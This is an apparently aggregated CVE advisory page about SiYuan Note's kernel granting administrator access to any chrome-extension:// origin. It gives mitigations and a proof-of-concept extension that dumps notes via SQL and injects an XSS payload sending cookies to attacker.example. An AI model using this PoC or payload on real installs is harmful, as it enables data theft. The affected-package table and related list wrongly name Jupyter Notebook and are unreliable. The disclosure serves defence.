SiYuan Note's desktop kernel blindly trusts any `chrome-extension://` origin and grants it full RoleAdministrator access, and because the default AccessAuthCode is empty on desktop installs, that trust requires zero tokens or credentials to exploit. Any installed browser extension — including a previously benign one hijacked via a supply-chain update — can silently read the entire notes workspace, inject stored XSS, and rewrite configuration, which matters because SiYuan is increasingly used as a personal or team knowledge base that may hold LLM prompts, API keys, or RAG source material. The practical risk today is moderate rather than urgent: EPSS sits at 0.6% (top 55th percentile), it is not in CISA KEV, and no public exploit or Nuclei template exists, so this looks like a design flaw awaiting weaponization rather than an active campaign. With 2,965 downstream dependents and an OpenSSF Scorecard of only 5.8/10, the exposure surface is real even if current exploitation signal is low. Until an upstream fix lands, manually set a strong `AccessAuthCode` in the workspace config immediately, audit which Chrome extensions are installed on machines running SiYuan, and monitor kernel access logs (127.0.0.1:6806) for `chrome-extension://` origins hitting admin endpoints like `/api/query/sql` or `/api/system/setConf`.
What is the risk?
Rated critical by the advisory due to the completeness of the compromise achievable — unauthenticated RoleAdministrator access to every admin API endpoint — but real-world exploitability is currently constrained: the attacker needs the victim to already have a malicious or compromised Chrome/Chromium extension installed, meaning this is a local co-residency attack rather than a remote network exploit. EPSS scoring it in only the top 55th percentile and its absence from CISA KEV corroborate that there is no evidence of active exploitation yet. However, the trivial technical bar (no special extension permissions, no auth token, no user interaction beyond having the extension installed) combined with the supply-chain amplification risk — a single compromised popular extension update could silently hit every SiYuan desktop user — means the risk profile can escalate quickly and without warning once a weaponized extension exists in the wild.
How does the attack unfold?
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| Jupyter Notebook | go | < 0.0.0-20260628153353-2d5d72223df4 | 0.0.0-20260628153353-2d5d72223df4 |
Do you use Jupyter Notebook? You're affected.
How severe is it?
What should I do?
1 step-
1) Manually set a strong, non-empty
AccessAuthCodein the SiYuan workspace configuration immediately — this closes the practical exploit path even before an upstream code fix exists. 2) Track the vendor's fix branch (currently the chrome-extension allowlist remains unfixed as of commit d7b77d945e0d) and upgrade as soon as a release actually removes the blanketchrome-extension://trust inkernel/model/session.go. 3) Audit installed Chrome/Chromium extensions on any machine running SiYuan and remove unnecessary ones to shrink the attack surface. 4) Monitor kernel HTTP logs on 127.0.0.1:6806 for requests bearing achrome-extension://Origin header hitting sensitive endpoints (/api/query/sql,/api/filetree/,/api/system/setConf,/api/block/insertBlock) as a detection signal. 5) If custom extension integration with SiYuan is required, wait for or request the vendor implement a per-session pairing token rather than trusting the entire scheme.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2026-54069?
SiYuan Note's desktop kernel blindly trusts any `chrome-extension://` origin and grants it full RoleAdministrator access, and because the default AccessAuthCode is empty on desktop installs, that trust requires zero tokens or credentials to exploit. Any installed browser extension — including a previously benign one hijacked via a supply-chain update — can silently read the entire notes workspace, inject stored XSS, and rewrite configuration, which matters because SiYuan is increasingly used as a personal or team knowledge base that may hold LLM prompts, API keys, or RAG source material. The practical risk today is moderate rather than urgent: EPSS sits at 0.6% (top 55th percentile), it is not in CISA KEV, and no public exploit or Nuclei template exists, so this looks like a design flaw awaiting weaponization rather than an active campaign. With 2,965 downstream dependents and an OpenSSF Scorecard of only 5.8/10, the exposure surface is real even if current exploitation signal is low. Until an upstream fix lands, manually set a strong `AccessAuthCode` in the workspace config immediately, audit which Chrome extensions are installed on machines running SiYuan, and monitor kernel access logs (127.0.0.1:6806) for `chrome-extension://` origins hitting admin endpoints like `/api/query/sql` or `/api/system/setConf`.
Is CVE-2026-54069 actively exploited?
No confirmed active exploitation of CVE-2026-54069 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-54069?
1) Manually set a strong, non-empty `AccessAuthCode` in the SiYuan workspace configuration immediately — this closes the practical exploit path even before an upstream code fix exists. 2) Track the vendor's fix branch (currently the chrome-extension allowlist remains unfixed as of commit d7b77d945e0d) and upgrade as soon as a release actually removes the blanket `chrome-extension://` trust in `kernel/model/session.go`. 3) Audit installed Chrome/Chromium extensions on any machine running SiYuan and remove unnecessary ones to shrink the attack surface. 4) Monitor kernel HTTP logs on 127.0.0.1:6806 for requests bearing a `chrome-extension://` Origin header hitting sensitive endpoints (`/api/query/sql`, `/api/filetree/`, `/api/system/setConf`, `/api/block/insertBlock`) as a detection signal. 5) If custom extension integration with SiYuan is required, wait for or request the vendor implement a per-session pairing token rather than trusting the entire scheme.
What systems are affected by CVE-2026-54069?
This vulnerability affects the following AI/ML architecture patterns: RAG pipelines, agent frameworks, desktop AI knowledge/note tooling.
What is the CVSS score for CVE-2026-54069?
No CVSS score has been assigned yet.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0010.005 AI Agent Tool AML.T0025 Exfiltration via Cyber Means AML.T0037 Data from Local System Compliance Controls Affected
What are the technical details?
Original Advisory
## Summary SiYuan Note's kernel HTTP server unconditionally trusts all `chrome-extension://` origins, granting `RoleAdministrator` access to every installed browser extension without any authentication. Combined with the default empty `AccessAuthCode` on desktop installs, any Chrome/Chromium extension -- including a compromised legitimate extension via supply chain attack -- can make fully authenticated admin API calls to the SiYuan kernel at `127.0.0.1:6806`, enabling data exfiltration, stored XSS injection, and configuration tampering. ## Affected Versions SiYuan <= v3.6.5 (commit `96dfe0bea474`). The chrome-extension allowlist remains unfixed as of the latest commit on the fix branch (`d7b77d945e0d`). ## Vulnerability Details ### Blanket chrome-extension:// Origin Trust (CWE-346) In `kernel/model/session.go:277`, the `CheckAuth` middleware exempts all `chrome-extension://` origins from authentication: ```go if strings.HasPrefix(origin, "chrome-extension://") { // skip auth } ``` At `session.go:284`, the request is assigned `RoleAdministrator`: ```go c.Set("role", model.RoleAdministrator) ``` The `AccessAuthCode` field defaults to an empty string for desktop installs (`ContainerStd`). When empty, no token validation occurs. This means **any** Chrome/Chromium extension can make fully authenticated admin API calls to the SiYuan kernel. The origin check trusts the entire `chrome-extension://` scheme rather than validating a specific extension ID, so every installed extension (including those with no explicit `host_permissions`) can access all admin endpoints. ## Proof of Concept **Unauthenticated admin API access via browser extension:** A minimal Chrome extension with only default permissions: ```json { "manifest_version": 3, "name": "SiYuan PoC", "version": "1.0", "background": { "service_worker": "bg.js" } } ``` ```javascript // bg.js -- runs as chrome-extension://<id> // No special host_permissions needed; localhost is accessible by default // 1. Verify admin access fetch('http://127.0.0.1:6806/api/system/getConf', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: '{}' }).then(r => r.json()).then(data => { console.log('[PoC] Admin API access confirmed:', data.code === 0); }); // 2. Exfiltrate workspace data fetch('http://127.0.0.1:6806/api/query/sql', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ stmt: 'SELECT * FROM blocks LIMIT 100' }) }).then(r => r.json()).then(data => { console.log('[PoC] Exfiltrated blocks:', data.data?.length); }); // 3. Inject stored XSS payload into a note fetch('http://127.0.0.1:6806/api/filetree/listDocsByPath', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ notebook: '', path: '/' }) }).then(r => r.json()).then(tree => { const firstDoc = tree.data?.files?.[0]; if (!firstDoc) return; fetch('http://127.0.0.1:6806/api/block/insertBlock', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ dataType: 'markdown', data: '<img src=x onerror="fetch(\'https://attacker.example/steal?data=\'+document.cookie)">', parentID: firstDoc.id }) }); }); ``` The extension requires zero special permissions. The `chrome-extension://` origin header is automatically sent by the browser, and `session.go:277` grants it `RoleAdministrator` without any token check. ## Impact - **Unauthenticated admin API access** for any installed browser extension, enabling full control of the SiYuan kernel - **Data exfiltration** of the entire workspace via `/api/query/sql`, `/api/filetree/`, `/api/export/` - **Stored XSS injection** via admin API endpoints (`/api/block/insertBlock`, `/api/attr/setBlockAttrs`), persisted in the user's notes - **Configuration tampering** via `/api/system/setConf`, enabling persistence and further attack surface expansion - **Supply chain amplification**: a single compromised popular Chrome extension update can silently exploit every SiYuan desktop user ## Suggested Remediation **Remove blanket chrome-extension:// allowlist:** ```diff --- a/kernel/model/session.go +++ b/kernel/model/session.go @@ -274,9 +274,6 @@ func CheckAuth(c *gin.Context) { origin := c.GetHeader("Origin") - if strings.HasPrefix(origin, "chrome-extension://") { - // Allow chrome extension requests - } else if !isValidOrigin(origin) { c.AbortWithStatusJSON(401, gin.H{"code": -1, "msg": "invalid origin"}) return ``` If extension access is required, implement a per-session token exchange: the SiYuan UI generates a random token on startup, and the extension must present it via a dedicated pairing endpoint. This ensures only explicitly authorized extensions can access the API.
Exploitation Scenario
An attacker compromises a popular, unrelated Chrome extension through a supply-chain attack (or publishes a new extension requiring no special permissions) and pushes an update containing a malicious background service worker. Once installed in the browser of a user running SiYuan Note locally, the service worker silently fetches `http://127.0.0.1:6806/api/system/getConf` to confirm admin access, then calls `/api/query/sql` to dump the `blocks` table and exfiltrate the user's entire notes workspace — potentially including API keys, credentials, or AI prompt/agent configuration stored as notes. It then walks `/api/filetree/listDocsByPath` and injects a stored XSS payload via `/api/block/insertBlock` into an existing document for follow-on persistence or lateral compromise, and optionally calls `/api/system/setConf` to tamper with configuration for long-term access.
Weaknesses (CWE)
CWE-346 — Origin Validation Error: The product does not properly verify that the source of data or communication is valid.
Source: MITRE CWE corpus.
References
Timeline
Related Vulnerabilities
CVE-2026-44727 9.0 jupyter-server: stored XSS yields kernel RCE
Same package: notebook CVE-2026-52798 8.9 Gogs: Stored XSS via .ipynb Markdown re-render bypass
Same package: notebook CVE-2026-42557 8.8 JupyterLab: one-click RCE via notebook HTML cell output
Same package: notebook CVE-2026-42266 8.8 JupyterLab: Extension allow-list bypass enables privesc
Same package: notebook CVE-2026-5422 8.1 jupyter-server: path traversal exposes sibling dir files
Same package: notebook